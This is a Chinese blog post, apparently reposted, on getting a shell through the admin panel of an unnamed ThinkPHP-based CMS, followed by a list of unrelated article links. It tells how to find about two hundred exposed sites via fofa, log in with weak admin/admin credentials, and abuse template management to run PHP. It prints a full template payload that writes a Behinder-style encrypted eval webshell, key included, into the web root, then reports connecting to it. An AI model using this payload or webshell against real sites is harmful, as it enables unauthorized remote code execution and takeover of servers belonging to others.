某CMS后台通杀getshell
时间:2021-08-24
本文章向大家介绍某CMS后台通杀getshell,主要包括某CMS后台通杀getshell使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
此CMS是基于thinkphp框架二次开发的,目前有thinkphp5,以及thinkphp6两种版本。这些漏洞挖掘出来的时候已经在cnvd被提交过了。但是网上并没有漏洞文章。避免风险这里只分享思路。
通过fofa搜一下,大概两百多个独立IP
还不错,这个后台一般是个弱口令 admin admin
登录后可以查看到,具体thinkphp版本,这个对版本要求比较高,6.05以后好像就修复了。因为太明显了所以厚码,见谅。
这后台可以getshell原因是因为此处模板管理可以添加一个html页面,这里我们直接写phpinfo是可以查看到的。
<?php phpinfo(); ?>
模板命名需要以article_开头,不然无法生效。
然后到文章模块去添加一个文章,来调用新建模板。
重点是调用模板名,需是我们之前添加的模板名。这里添加完成后提交生成即可。然后预览一下添加的文章即可。
可以看到代码已经生效,这里我一开始也以为可以直接写php一句话,但是发现写是可以写,但是因为后缀是html,webshell连接不上。
在html模板中添加php写文件代码路径我们可以从phpinfo中获取
{php}
echo "eeeee";
$myfile = fopen("/www/wwwroot/web/public/template/default/index/css/v.php", "w") or die("Unable to open file!");
$txt = '<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
$_SESSION["k"]=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded("openssl"))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode("|",$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>';
fwrite($myfile, $txt);
fclose($myfile);
{/php}
依旧是文章模块中进行调用此模板。保存后预览即可。
可以看到已经输出内容,证明代码已经写入文件。
这里正常链接上冰蝎。
总结:
虽然模板中添加的是{php}格式,但是实际解析出来会变成<>内容.算是个小知识点。
原文地址:https://www.cnblogs.com/fushiruzuo/p/15180399.html
- 分布式事务 TCC-Transaction 源码分析 —— 事务恢复
- Go的语言特性总结
- 注册中心 Eureka 源码解析 —— Eureka-Client 初始化(三)之 EurekaClient
- 从一次 Snowflake 异常说起
- 分布式事务 TCC-Transaction 源码分析 —— Dubbo 支持
- 2016 腾讯软件开发面试题(部分)
- 分布式事务 TCC-Transaction 源码分析 —— 运维平台
- 2016美团面试经历
- 2016年百度面试经历
- 注册中心 Eureka 源码解析 —— Eureka-Client 初始化(二)之 EurekaClientConfig
- Golang 中"泛型"的支持
- 编码习惯之Controller规范
- Go-简洁的并发
- 多线程基础之Runnable/Thread与Callable
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- pandas:字段值插入数据表第一行的解决办法
- Recommending items to more than a billion people(面向十亿级用户的推荐系统)
- pandas:对字符串类型做差分比较
- pandas:由列层次化索引延伸的一些思考
- 远程过程调用 Java RMI 技术 远程控制
- Real-time Xenomai 3 example 1
- Electron 常见问题收录II
- SQL性能调优技巧
- Linux查看CUDA版本以及cudnn版本号
- 数据结构算法操作试题(C++/Python)——最长有效括号
- 数据结构算法操作试题(C++/Python)——两两交换链表中的节点
- 数据结构算法操作试题(C++/Python)——最大子序和
- 数据结构算法操作试题(C++/Python)——四数之和
- 数据结构算法操作试题(C++/Python)——在排序数组中查找元素的第一个和最后一个位置
- 数据结构算法操作试题(C++/Python)——搜索旋转排序数组